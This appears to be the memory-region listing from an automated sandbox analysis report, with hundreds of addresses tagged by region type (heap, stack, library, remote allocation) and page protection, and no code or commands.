1EC74460000
|
heap
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
2262F357000
|
heap
|
page read and write
|
||
|
2262D13B000
|
heap
|
page read and write
|
||
|
71CB23D000
|
stack
|
page read and write
|
||
|
10F0000
|
heap
|
page read and write
|
||
|
71CB4BC000
|
stack
|
page read and write
|
||
|
7FFD9B8A4000
|
trusted library allocation
|
page read and write
|
||
|
2262F0B0000
|
remote allocation
|
page read and write
|
||
|
2262F2D4000
|
heap
|
page read and write
|
||
|
2262F9B1000
|
heap
|
page read and write
|
||
|
4EEE000
|
trusted library allocation
|
page read and write
|
||
|
2262F3AD000
|
heap
|
page read and write
|
||
|
7FFD9B6F2000
|
trusted library allocation
|
page read and write
|
||
|
2262D1A9000
|
heap
|
page read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
71CB2BE000
|
stack
|
page read and write
|
||
|
B150FFE000
|
stack
|
page read and write
|
||
|
2262D000000
|
heap
|
page read and write
|
||
|
1F406E58000
|
trusted library allocation
|
page read and write
|
||
|
1F404749000
|
heap
|
page read and write
|
||
|
2262D06B000
|
heap
|
page read and write
|
||
|
2262D1A9000
|
heap
|
page read and write
|
||
|
71CB33E000
|
stack
|
page read and write
|
||
|
7FFD9B8E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
CAD000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EC76570000
|
heap
|
page execute and read and write
|
||
|
7FFD9B70C000
|
trusted library allocation
|
page read and write
|
||
|
2AF3000
|
trusted library allocation
|
page read and write
|
||
|
623E000
|
stack
|
page read and write
|
||
|
2262FA82000
|
heap
|
page read and write
|
||
|
2262EE98000
|
heap
|
page read and write
|
||
|
6267000
|
trusted library allocation
|
page read and write
|
||
|
E10000
|
trusted library allocation
|
page execute and read and write
|
||
|
2262D142000
|
heap
|
page read and write
|
||
|
2262F5A0000
|
heap
|
page read and write
|
||
|
B1518FE000
|
stack
|
page read and write
|
||
|
2262FB84000
|
heap
|
page read and write
|
||
|
71CAC73000
|
stack
|
page read and write
|
||
|
2262D06E000
|
heap
|
page read and write
|
||
|
4F8E000
|
stack
|
page read and write
|
||
|
7FFD9B8AA000
|
trusted library allocation
|
page read and write
|
||
|
1EC744B2000
|
heap
|
page read and write
|
||
|
C80000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
|
1EC74720000
|
heap
|
page readonly
|
||
|
4EDB000
|
trusted library allocation
|
page read and write
|
||
|
2262EE9C000
|
heap
|
page read and write
|
||
|
1F409841000
|
trusted library allocation
|
page read and write
|
||
|
2262FA82000
|
heap
|
page read and write
|
||
|
9EA3FFE000
|
stack
|
page read and write
|
||
|
71CAD7E000
|
stack
|
page read and write
|
||
|
1EC76740000
|
heap
|
page read and write
|
||
|
2262FA83000
|
heap
|
page read and write
|
||
|
2262F410000
|
heap
|
page read and write
|
||
|
1EC744B6000
|
heap
|
page read and write
|
||
|
2262D10A000
|
heap
|
page read and write
|
||
|
5D80000
|
heap
|
page read and write
|
||
|
7FFD9B7D6000
|
trusted library allocation
|
page execute and read and write
|
||
|
2262FBA3000
|
heap
|
page read and write
|
||
|
1EC003AA000
|
trusted library allocation
|
page read and write
|
||
|
1F4067D1000
|
trusted library allocation
|
page read and write
|
||
|
1F416760000
|
trusted library allocation
|
page read and write
|
||
|
2262F2D9000
|
heap
|
page read and write
|
||
|
D9A000
|
trusted library allocation
|
page execute and read and write
|
||
|
DAB000
|
trusted library allocation
|
page execute and read and write
|
||
|
2262F336000
|
heap
|
page read and write
|
||
|
2262F0B0000
|
remote allocation
|
page read and write
|
||
|
1F404721000
|
heap
|
page read and write
|
||
|
1F406190000
|
trusted library allocation
|
page read and write
|
||
|
71CB0BE000
|
stack
|
page read and write
|
||
|
2A66000
|
trusted library allocation
|
page read and write
|
||
|
2262D14B000
|
heap
|
page read and write
|
||
|
4EFD000
|
trusted library allocation
|
page read and write
|
||
|
1EC76434000
|
heap
|
page read and write
|
||
|
1F40D5F4000
|
trusted library allocation
|
page read and write
|
||
|
1F406B2B000
|
trusted library allocation
|
page read and write
|
||
|
2262D0DF000
|
heap
|
page read and write
|
||
|
71CB43E000
|
stack
|
page read and write
|
||
|
6330000
|
trusted library allocation
|
page read and write
|
||
|
2262F391000
|
heap
|
page read and write
|
||
|
2262FACE000
|
heap
|
page read and write
|
||
|
2AB2000
|
trusted library allocation
|
page read and write
|
||
|
9EA40FE000
|
stack
|
page read and write
|
||
|
1F40474B000
|
heap
|
page read and write
|
||
|
2262D130000
|
heap
|
page read and write
|
||
|
1F406E7D000
|
trusted library allocation
|
page read and write
|
||
|
1EC0006C000
|
trusted library allocation
|
page read and write
|
||
|
1F404705000
|
heap
|
page read and write
|
||
|
613E000
|
stack
|
page read and write
|
||
|
2ACA000
|
trusted library allocation
|
page read and write
|
||
|
B151AFB000
|
stack
|
page read and write
|
||
|
2262EE9E000
|
heap
|
page read and write
|
||
|
1EC10001000
|
trusted library allocation
|
page read and write
|
||
|
1EC7651F000
|
heap
|
page read and write
|
||
|
C9D000
|
trusted library allocation
|
page execute and read and write
|
||
|
9EA3BCE000
|
stack
|
page read and write
|
||
|
2262EE96000
|
heap
|
page read and write
|
||
|
2262F367000
|
heap
|
page read and write
|
||
|
1EC76430000
|
heap
|
page read and write
|
||
|
2262D0B0000
|
heap
|
page read and write
|
||
|
2262F2B0000
|
heap
|
page read and write
|
||
|
1EC00602000
|
trusted library allocation
|
page read and write
|
||
|
4B8D000
|
stack
|
page read and write
|
||
|
2262CFF0000
|
heap
|
page read and write
|
||
|
71CAE7D000
|
stack
|
page read and write
|
||
|
6280000
|
trusted library allocation
|
page read and write
|
||
|
1EC004A0000
|
trusted library allocation
|
page read and write
|
||
|
1EC744C8000
|
heap
|
page read and write
|
||
|
B30000
|
heap
|
page read and write
|
||
|
1F4167CE000
|
trusted library allocation
|
page read and write
|
||
|
2262D14A000
|
heap
|
page read and write
|
||
|
4EF1000
|
trusted library allocation
|
page read and write
|
||
|
2262F33F000
|
heap
|
page read and write
|
||
|
B1510FE000
|
stack
|
page read and write
|
||
|
4FCE000
|
stack
|
page read and write
|
||
|
7FFD9B8A1000
|
trusted library allocation
|
page read and write
|
||
|
2262D13B000
|
heap
|
page read and write
|
||
|
2262D140000
|
heap
|
page read and write
|
||
|
2262FB42000
|
heap
|
page read and write
|
||
|
7FFD9B6F4000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7A0000
|
trusted library allocation
|
page read and write
|
||
|
2262F2CE000
|
heap
|
page read and write
|
||
|
AF9000
|
stack
|
page read and write
|
||
|
E60000
|
heap
|
page read and write
|
||
|
6240000
|
trusted library allocation
|
page read and write
|
||
|
2262EEB4000
|
heap
|
page read and write
|
||
|
71CAEFE000
|
stack
|
page read and write
|
||
|
1F406B40000
|
trusted library allocation
|
page read and write
|
||
|
10B0000
|
trusted library allocation
|
page read and write
|
||
|
E30000
|
heap
|
page execute and read and write
|
||
|
2AD2000
|
trusted library allocation
|
page read and write
|
||
|
4EF6000
|
trusted library allocation
|
page read and write
|
||
|
1EC74660000
|
heap
|
page read and write
|
||
|
2262F2A0000
|
heap
|
page read and write
|
||
|
1EC76640000
|
heap
|
page read and write
|
||
|
2262D13B000
|
heap
|
page read and write
|
||
|
1EC744F6000
|
heap
|
page read and write
|
||
|
2262D130000
|
heap
|
page read and write
|
||
|
1F4046C9000
|
heap
|
page read and write
|
||
|
9EA413E000
|
stack
|
page read and write
|
||
|
6270000
|
trusted library allocation
|
page read and write
|
||
|
1EC0001F000
|
trusted library allocation
|
page read and write
|
||
|
1F40D5BC000
|
trusted library allocation
|
page read and write
|
||
|
1EC00027000
|
trusted library allocation
|
page read and write
|
||
|
1EC7448F000
|
heap
|
page read and write
|
||
|
2262D148000
|
heap
|
page read and write
|
||
|
52DE000
|
stack
|
page read and write
|
||
|
2262D06C000
|
heap
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
39F9000
|
trusted library allocation
|
page read and write
|
||
|
2262F304000
|
heap
|
page read and write
|
||
|
7FFD9B7B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F4048B0000
|
heap
|
page read and write
|
||
|
1F404701000
|
heap
|
page read and write
|
||
|
2262EE9C000
|
heap
|
page read and write
|
||
|
9EA3EFD000
|
stack
|
page read and write
|
||
|
5FFD000
|
stack
|
page read and write
|
||
|
39F1000
|
trusted library allocation
|
page read and write
|
||
|
2262D153000
|
heap
|
page read and write
|
||
|
29EF000
|
stack
|
page read and write
|
||
|
6320000
|
heap
|
page read and write
|
||
|
1EC00099000
|
trusted library allocation
|
page read and write
|
||
|
2262D118000
|
heap
|
page read and write
|
||
|
1EC7644E000
|
heap
|
page read and write
|
||
|
10F3000
|
heap
|
page read and write
|
||
|
7FFD9B8C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F4167C2000
|
trusted library allocation
|
page read and write
|
||
|
9EA43BE000
|
stack
|
page read and write
|
||
|
2ADC000
|
trusted library allocation
|
page read and write
|
||
|
2262D142000
|
heap
|
page read and write
|
||
|
2262F050000
|
heap
|
page read and write
|
||
|
7F700000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EC0011A000
|
trusted library allocation
|
page read and write
|
||
|
2262F9DD000
|
heap
|
page read and write
|
||
|
1EC00470000
|
trusted library allocation
|
page read and write
|
||
|
1F40A241000
|
trusted library allocation
|
page read and write
|
||
|
1EC003BC000
|
trusted library allocation
|
page read and write
|
||
|
2262F363000
|
heap
|
page read and write
|
||
|
1F4048D5000
|
heap
|
page read and write
|
||
|
1F4046B0000
|
heap
|
page read and write
|
||
|
2262F0B0000
|
remote allocation
|
page read and write
|
||
|
4EDE000
|
trusted library allocation
|
page read and write
|
||
|
B1515FE000
|
stack
|
page read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
|
1F4060A0000
|
heap
|
page read and write
|
||
|
1F406B44000
|
trusted library allocation
|
page read and write
|
||
|
1F406100000
|
trusted library allocation
|
page read and write
|
||
|
1EC764EC000
|
heap
|
page read and write
|
||
|
1F40D59C000
|
trusted library allocation
|
page read and write
|
||
|
10C0000
|
trusted library allocation
|
page read and write
|
||
|
C1B000
|
heap
|
page read and write
|
||
|
1EC76444000
|
heap
|
page read and write
|
||
|
3A59000
|
trusted library allocation
|
page read and write
|
||
|
2262FB84000
|
heap
|
page read and write
|
||
|
4F4C000
|
stack
|
page read and write
|
||
|
5D9F000
|
heap
|
page read and write
|
||
|
2262D189000
|
heap
|
page read and write
|
||
|
1F406240000
|
heap
|
page read and write
|
||
|
2262EE9C000
|
heap
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
1EC0011D000
|
trusted library allocation
|
page read and write
|
||
|
9EA3AC3000
|
stack
|
page read and write
|
||
|
1EC74512000
|
heap
|
page read and write
|
||
|
1140000
|
heap
|
page read and write
|
||
|
1EC76577000
|
heap
|
page execute and read and write
|
||
|
1EC0042D000
|
trusted library allocation
|
page read and write
|
||
|
2262F9B0000
|
heap
|
page read and write
|
||
|
B1517FF000
|
stack
|
page read and write
|
||
|
551E000
|
stack
|
page read and write
|
||
|
1F40D608000
|
trusted library allocation
|
page read and write
|
||
|
2262EE9D000
|
heap
|
page read and write
|
||
|
9EA3F7F000
|
stack
|
page read and write
|
||
|
1EC7446D000
|
heap
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
B1512FE000
|
stack
|
page read and write
|
||
|
2262FA2E000
|
heap
|
page read and write
|
||
|
71CB137000
|
stack
|
page read and write
|
||
|
1EC744F2000
|
heap
|
page read and write
|
||
|
1F40A901000
|
trusted library allocation
|
page read and write
|
||
|
2262FA5A000
|
heap
|
page read and write
|
||
|
CA0000
|
trusted library allocation
|
page read and write
|
||
|
2262D148000
|
heap
|
page read and write
|
||
|
1EC74795000
|
heap
|
page read and write
|
||
|
7FFD9B7A6000
|
trusted library allocation
|
page read and write
|
||
|
1EC00708000
|
trusted library allocation
|
page read and write
|
||
|
1EC74710000
|
trusted library allocation
|
page read and write
|
||
|
2262F2C0000
|
heap
|
page read and write
|
||
|
2262FB8D000
|
heap
|
page read and write
|
||
|
4FD0000
|
heap
|
page execute and read and write
|
||
|
E0E000
|
stack
|
page read and write
|
||
|
1F406B48000
|
trusted library allocation
|
page read and write
|
||
|
4ED0000
|
trusted library allocation
|
page read and write
|
||
|
2262D020000
|
heap
|
page read and write
|
||
|
1EC744AA000
|
heap
|
page read and write
|
||
|
1F406E88000
|
trusted library allocation
|
page read and write
|
||
|
2262D0E0000
|
heap
|
page read and write
|
||
|
B1513FE000
|
stack
|
page read and write
|
||
|
1F406592000
|
heap
|
page read and write
|
||
|
2262FB85000
|
heap
|
page read and write
|
||
|
2262FB9E000
|
heap
|
page read and write
|
||
|
B68000
|
heap
|
page read and write
|
||
|
1EC0012B000
|
trusted library allocation
|
page read and write
|
||
|
2262EE9C000
|
heap
|
page read and write
|
||
|
2262F400000
|
heap
|
page read and write
|
||
|
1EC746A0000
|
heap
|
page read and write
|
||
|
1EC744A8000
|
heap
|
page read and write
|
||
|
2262F352000
|
heap
|
page read and write
|
||
|
2AE2000
|
trusted library allocation
|
page read and write
|
||
|
B1514FF000
|
stack
|
page read and write
|
||
|
2262D148000
|
heap
|
page read and write
|
||
|
1EC003E6000
|
trusted library allocation
|
page read and write
|
||
|
C94000
|
trusted library allocation
|
page read and write
|
||
|
1F416751000
|
trusted library allocation
|
page read and write
|
||
|
2262FB91000
|
heap
|
page read and write
|
||
|
1EC005B8000
|
trusted library allocation
|
page read and write
|
||
|
2262EFA0000
|
heap
|
page read and write
|
||
|
2262F304000
|
heap
|
page read and write
|
||
|
2262FB84000
|
heap
|
page read and write
|
||
|
2262D0B9000
|
heap
|
page read and write
|
||
|
1EC746E0000
|
trusted library allocation
|
page read and write
|
||
|
2262F3AD000
|
heap
|
page read and write
|
||
|
2262D130000
|
heap
|
page read and write
|
||
|
2262EE93000
|
heap
|
page read and write
|
||
|
2ADE000
|
trusted library allocation
|
page read and write
|
||
|
1F404724000
|
heap
|
page read and write
|
||
|
2B07000
|
trusted library allocation
|
page read and write
|
||
|
2262D068000
|
heap
|
page read and write
|
||
|
1F40D5FC000
|
trusted library allocation
|
page read and write
|
||
|
2262F2CB000
|
heap
|
page read and write
|
||
|
1EC74730000
|
trusted library allocation
|
page read and write
|
||
|
2262F34E000
|
heap
|
page read and write
|
||
|
2262F33B000
|
heap
|
page read and write
|
||
|
1F406EC3000
|
trusted library allocation
|
page read and write
|
||
|
2262EB40000
|
heap
|
page read and write
|
||
|
2262FB99000
|
heap
|
page read and write
|
||
|
2262D1A9000
|
heap
|
page read and write
|
||
|
1EC00117000
|
trusted library allocation
|
page read and write
|
||
|
2262D13B000
|
heap
|
page read and write
|
||
|
1F406246000
|
heap
|
page read and write
|
||
|
2262FA82000
|
heap
|
page read and write
|
||
|
71CADFE000
|
stack
|
page read and write
|
||
|
2262F2B7000
|
heap
|
page read and write
|
||
|
1F408441000
|
trusted library allocation
|
page read and write
|
||
|
2262F2D7000
|
heap
|
page read and write
|
||
|
1F4060E0000
|
trusted library allocation
|
page read and write
|
||
|
2262F3AD000
|
heap
|
page read and write
|
||
|
1F40C701000
|
trusted library allocation
|
page read and write
|
||
|
2262FA99000
|
heap
|
page read and write
|
||
|
1F40BD01000
|
trusted library allocation
|
page read and write
|
||
|
2262D189000
|
heap
|
page read and write
|
||
|
1F406975000
|
trusted library allocation
|
page read and write
|
||
|
2262F373000
|
heap
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
1EC10071000
|
trusted library allocation
|
page read and write
|
||
|
1EC746F6000
|
heap
|
page read and write
|
||
|
C90000
|
trusted library allocation
|
page read and write
|
||
|
2262D108000
|
heap
|
page read and write
|
||
|
1F4046D6000
|
heap
|
page read and write
|
||
|
1F40E527000
|
trusted library allocation
|
page read and write
|
||
|
B1516FB000
|
stack
|
page read and write
|
||
|
71CAFFE000
|
stack
|
page read and write
|
||
|
2262F3AD000
|
heap
|
page read and write
|
||
|
2262D10A000
|
heap
|
page read and write
|
||
|
7FFD9B930000
|
trusted library allocation
|
page read and write
|
||
|
1EC744AE000
|
heap
|
page read and write
|
||
|
2262F34B000
|
heap
|
page read and write
|
||
|
4EE2000
|
trusted library allocation
|
page read and write
|
||
|
7DF4EEC10000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EC0044F000
|
trusted library allocation
|
page read and write
|
||
|
2B01000
|
trusted library allocation
|
page read and write
|
||
|
53DE000
|
stack
|
page read and write
|
||
|
2262D060000
|
heap
|
page read and write
|
||
|
1EC0040C000
|
trusted library allocation
|
page read and write
|
||
|
2262FB07000
|
heap
|
page read and write
|
||
|
4F02000
|
trusted library allocation
|
page read and write
|
||
|
1EC76540000
|
heap
|
page execute and read and write
|
||
|
7FFD9B8B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2262F2B5000
|
heap
|
page read and write
|
||
|
E40000
|
heap
|
page read and write
|
||
|
1146000
|
heap
|
page read and write
|
||
|
1F4046C0000
|
heap
|
page read and write
|
||
|
2262D158000
|
heap
|
page read and write
|
||
|
71CB3BE000
|
stack
|
page read and write
|
||
|
1EC00167000
|
trusted library allocation
|
page read and write
|
||
|
C09000
|
heap
|
page read and write
|
||
|
9EA407E000
|
stack
|
page read and write
|
||
|
1F406740000
|
heap
|
page read and write
|
||
|
1EC00490000
|
trusted library allocation
|
page read and write
|
||
|
2262FA82000
|
heap
|
page read and write
|
||
|
DA2000
|
trusted library allocation
|
page read and write
|
||
|
1EC0016D000
|
trusted library allocation
|
page read and write
|
||
|
5580000
|
heap
|
page read and write
|
||
|
2262D06A000
|
heap
|
page read and write
|
||
|
2262D06D000
|
heap
|
page read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
|
DC0000
|
trusted library allocation
|
page read and write
|
||
|
1F41692B000
|
trusted library allocation
|
page read and write
|
||
|
1F406B70000
|
trusted library allocation
|
page read and write
|
||
|
7B0000
|
heap
|
page read and write
|
||
|
B150EF4000
|
stack
|
page read and write
|
||
|
4ED6000
|
trusted library allocation
|
page read and write
|
||
|
1EC0071B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B6FD000
|
trusted library allocation
|
page execute and read and write
|
||
|
2262FA82000
|
heap
|
page read and write
|
||
|
7FFD9B700000
|
trusted library allocation
|
page read and write
|
||
|
2262EE98000
|
heap
|
page read and write
|
||
|
2262D0E5000
|
heap
|
page read and write
|
||
|
B5B000
|
heap
|
page read and write
|
||
|
2262F32D000
|
heap
|
page read and write
|
||
|
D96000
|
trusted library allocation
|
page execute and read and write
|
||
|
2262F9B7000
|
heap
|
page read and write
|
||
|
1F40D101000
|
trusted library allocation
|
page read and write
|
||
|
1EC74486000
|
heap
|
page read and write
|
||
|
1F40B301000
|
trusted library allocation
|
page read and write
|
||
|
E20000
|
trusted library allocation
|
page read and write
|
||
|
B38000
|
heap
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page read and write
|
||
|
1EC74780000
|
heap
|
page execute and read and write
|
||
|
2262F3AD000
|
heap
|
page read and write
|
||
|
1EC764B5000
|
heap
|
page read and write
|
||
|
1EC005B6000
|
trusted library allocation
|
page read and write
|
||
|
2262F145000
|
heap
|
page read and write
|
||
|
6640000
|
heap
|
page read and write
|
||
|
1100000
|
heap
|
page read and write
|
||
|
9EA3B4E000
|
stack
|
page read and write
|
||
|
1F4048D0000
|
heap
|
page read and write
|
||
|
51DB000
|
stack
|
page read and write
|
||
|
1EC00051000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8F0000
|
trusted library allocation
|
page read and write
|
||
|
6290000
|
trusted library allocation
|
page read and write
|
||
|
1EC00131000
|
trusted library allocation
|
page read and write
|
||
|
CB0000
|
heap
|
page read and write
|
||
|
2AEF000
|
trusted library allocation
|
page read and write
|
||
|
C93000
|
trusted library allocation
|
page execute and read and write
|
||
|
2AB8000
|
trusted library allocation
|
page read and write
|
||
|
2262F33B000
|
heap
|
page read and write
|
||
|
2262FB88000
|
heap
|
page read and write
|
||
|
2262F5B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B6F3000
|
trusted library allocation
|
page execute and read and write
|
||
|
2262F367000
|
heap
|
page read and write
|
||
|
BDC000
|
heap
|
page read and write
|
||
|
1F406B6B000
|
trusted library allocation
|
page read and write
|
||
|
2262D147000
|
heap
|
page read and write
|
||
|
71CAF7E000
|
stack
|
page read and write
|
||
|
1EC74558000
|
heap
|
page read and write
|
||
|
2262EE95000
|
heap
|
page read and write
|
||
|
7FFD9B910000
|
trusted library allocation
|
page read and write
|
||
|
3A19000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7AC000
|
trusted library allocation
|
page execute and read and write
|
||
|
2262D0E6000
|
heap
|
page read and write
|
||
|
2262D158000
|
heap
|
page read and write
|
||
|
2262D06B000
|
heap
|
page read and write
|
||
|
2262F338000
|
heap
|
page read and write
|
||
|
400000
|
remote allocation
|
page execute and read and write
|
||
|
2262D143000
|
heap
|
page read and write
|
||
|
1EC74560000
|
heap
|
page read and write
|
||
|
29F1000
|
trusted library allocation
|
page read and write
|
||
|
1EC00581000
|
trusted library allocation
|
page read and write
|
||
|
1EC000A0000
|
trusted library allocation
|
page read and write
|
||
|
1F406EC7000
|
trusted library allocation
|
page read and write
|
||
|
B65000
|
heap
|
page read and write
|
||
|
10AC000
|
stack
|
page read and write
|
||
|
2262D0FB000
|
heap
|
page read and write
|
||
|
71CBF0D000
|
stack
|
page read and write
|
There are 493 hidden memdumps, click here to show them.